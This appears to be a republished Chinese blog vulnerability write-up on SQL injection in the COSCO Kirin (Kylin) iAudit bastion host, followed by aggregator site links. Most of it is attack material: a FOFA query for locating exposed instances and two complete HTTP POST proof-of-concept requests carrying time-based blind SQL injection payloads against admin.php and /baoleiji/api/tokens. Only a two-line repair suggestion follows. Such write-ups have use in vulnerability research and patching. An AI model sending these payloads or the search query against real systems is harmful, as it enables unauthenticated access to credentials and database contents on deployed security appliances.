COSCO Kirin Fortress Machine SQL Injection Vulnerability Reappears

News 2023-08-26 03:20:14 views: null

0x01 Product Introduction

      Relying on its own strong research and development capabilities and rich industry experience, COSCO Kylin has independently developed a new generation of software and hardware integrated unified security operation and maintenance platform - iAudit unified security operation and maintenance platform. This product supports unified identity authentication, unified authorization, unified audit, and unified monitoring for enterprise operation and maintenance personnel in the operation and maintenance process, eliminating the blind spots in the traditional operation and maintenance process, and realizing simplified operation and maintenance, controllable operation, and Visualization is the most effective management platform for enterprise IT internal control.

0x02 Vulnerability Overview

    There is a sql injection vulnerability in the /baoleiji/api/tokens and admin.php interfaces of the COSCO Kirin Fortress machine. Unauthenticated attackers can use this vulnerability to obtain sensitive database information and credentials, which may eventually lead to server crashes.

0x03 Recurrence environment

FOFA:cert.subject="Baolei"

0x04 Vulnerability Reappearance 

PoC-1

POST /admin.php?controller=admin_commonuser HTTP/1.1
Host: your-ip
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0

username=admin' AND (SELECT 6999 FROM (SELECT(SLEEP(5)))ptGN) AND 'AAdm'='AAdm

5 seconds delay

 PoC-2

https://your-ip/baoleiji/api/tokens

In this case, there may be a loophole 

POST /baoleiji/api/tokens HTTP/1.1
Host: your-ip
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0

constr=1' AND (SELECT 6999 FROM (SELECT(SLEEP(10)))ptGN) AND'AAdm'='AAdm&title=%40127.0.0.1

 10 seconds delay

0x05 Repair suggestion 

Limit access source addresses, and do not open the system to the Internet unless necessary.

Upgrade to a safe version or apply a patch.

Guess you like

Origin blog.csdn.net/qq_41904294/article/details/132328217
Recommended
LFOSSA Yuanlaisusu Open Course | Mastering the Cloud Native Future: Comprehensive Guide to CNCF Certification and Exam Preparation Tips
Ranking
C++ Basic Syntax
bootstrapTable hides a column based on a condition
Why is reentrant lock recommended instead of Synchronized when dynamic high concurrency?
hexo create a blog
[Fully open source and non-encrypted version] Imitation of the eighth district distribution/online signature/multiple sets of download templates/APP distribution hosting/APP packaging and packaging
Polymerization combination
https://www.flysnow.org/2017/05/06/go-in-action-go-log.html
From the perspective of Flutter and the front-end, talk about how to ensure UI fluency under the single-threaded model
nginx-301, 302 redirect
Geolocation by IP Address in ASP.NET
Daily
More
2024-04-26(22)
2024-04-25(32)
2024-04-24(30)
2024-04-23(30)
2024-04-22(5)
2024-04-21(0)
2024-04-20(6)
2024-04-19(5)
2024-04-18(0)
2024-04-17(31)

Code World

© 2018 codetd.com